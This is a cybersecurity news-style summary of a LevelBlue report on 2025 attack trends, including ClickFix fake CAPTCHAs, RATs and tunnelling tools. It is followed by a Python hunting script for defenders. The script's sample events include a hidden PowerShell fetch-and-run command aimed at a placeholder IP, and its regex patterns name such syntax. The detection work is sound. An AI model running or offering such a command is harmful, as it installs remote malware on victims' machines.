
Exploring the emerging trends in cyber deception threats of 2025, from counterfeit CAPTCHAs to Remote Access Trojans (RATs).

Cybercriminals are becoming increasingly adept at deception, as highlighted in a recent LevelBlue report. Attackers are utilising social engineering techniques and legitimate tools to navigate through environments undetected. The report reveals a significant increase in the share of customers affected by security incidents, which nearly tripled from 6 per cent in late 2024 to 17 per cent in early 2025. More than half of these incidents originated at the initial access stage. Once attackers gained entry, they acted swiftly: the average time between compromise and lateral movement dropped below 60 minutes, and in some instances was under 15 minutes. This rapid movement is facilitated by the continued use of familiar tools such as Remote Desktop Protocol, which remains the most common method for moving between systems. Remote Monitoring and Management (RMM) software is also widely employed to maintain access, with many cases showing multiple RMM tools installed on the same host. Tunnelling utilities further help attackers evade firewalls and conceal their activity.

Fernando Martinez Sidera, Lead Threat Researcher at LevelBlue, noted a striking development in the sophistication of threat actors’ deceptive tactics in the first half of 2025. Threat actors are moving beyond traditional Business Email Compromise schemes and employing targeted social engineering to manipulate users into granting access. Once inside, attackers deploy Remote Access Trojans and quickly erase their tracks, enabling them to traverse networks with alarming speed. This trend is expected to persist throughout 2026. Additionally, there has been a decline in incidents related to Business Email Compromise, which still accounts for the largest share of initial access at 57 per cent, down from 74 per cent in the previous reporting period. This shift correlates with a sharp rise in fake CAPTCHA scams and help desk impersonation, with social engineering now constituting 39 per cent of initial access methods, nearly tripling since late 2024.

The ClickFix campaign is frequently cited: users are deceived into executing a line of code in the Windows Run box, mistakenly believing it to be a routine CAPTCHA or security prompt. Instead of verification, this action launches a PowerShell command that connects to an external server and downloads malware, often in the form of Remote Access Trojans such as NetSupport, Quasar, or Lumma Stealer. ClickFix-related activity surged by more than 1,400 per cent in just six months. Once attackers infiltrate a system, they rely on a combination of RMM tools and tunnelling to sustain access, using tools like Plink and Ngrok to create hidden connections that blend in with normal IT operations, making detection by defenders increasingly challenging.
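As an added illustration of how a defender might hunt for the three behaviours described above (a Run-box launch that fetches and runs remote content, more than one RMM agent on a host, and tunnelling binaries such as Plink or Ngrok), the following Python is not from the LevelBlue report; the Sysmon-style event fields, the RMM binary watch list and the sample events are assumptions constructed for this example.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events (not real telemetry); Windows paths as raw strings.
EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",  # Run box -> hidden fetch-and-run
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": 'powershell -w hidden -c "iwr http://203.0.113.5/v | iex"'},
    {"host": "ws01", "parent": r"C:\Windows\explorer.exe",  # benign: admin runs a local script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"powershell -NoProfile -File C:\scripts\backup.ps1"},
    {"host": "ws02", "parent": r"C:\Windows\System32\services.exe",  # RMM agent no. 1
     "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmd": "AnyDesk.exe --service"},
    {"host": "ws02", "parent": r"C:\Windows\System32\services.exe",  # RMM agent no. 2
     "image": r"C:\Program Files\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "cmd": "ScreenConnect.ClientService.exe"},
    {"host": "ws02", "parent": r"C:\Windows\System32\cmd.exe",  # tunnelling tool in a user-writable path
     "image": r"C:\Users\Public\plink.exe", "cmd": "plink.exe"},
]

# Assumed watch lists; the RMM set must be tuned to the agents your estate actually sanctions.
RMM_BINARIES = {"anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe"}
TUNNEL_BINARIES = {"plink.exe", "ngrok.exe"}
RUN_BOX_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
FETCH_AND_RUN = re.compile(
    r"\biwr\b|invoke-webrequest|\biex\b|invoke-expression|downloadstring|"
    r"downloadfile|-w(?:indowstyle)?\s+hidden|-enc\w*\s", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def detect_clickfix(events):
    """Shell spawned by explorer.exe (the Run box) whose command line fetches and runs remote content."""
    return [(e["host"], e["cmd"]) for e in events
            if basename(e["parent"]) == "explorer.exe"
            and basename(e["image"]) in RUN_BOX_SHELLS
            and FETCH_AND_RUN.search(e["cmd"])]

def detect_tunnelling(events):
    """Execution of a known tunnelling utility, wherever it lives on disk."""
    return [(e["host"], basename(e["image"])) for e in events
            if basename(e["image"]) in TUNNEL_BINARIES]

def detect_multiple_rmm(events, threshold=2):
    """Hosts running two or more distinct RMM agents, the stacking pattern the report calls out."""
    per_host = defaultdict(set)
    for e in events:
        if basename(e["image"]) in RMM_BINARIES:
            per_host[e["host"]].add(basename(e["image"]))
    return {h: sorted(n) for h, n in per_host.items() if len(n) >= threshold}
```

The benign Run-box script on ws01 is deliberately included so the ClickFix rule is seen to key on the fetch-and-run command line, not on explorer.exe spawning PowerShell alone.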
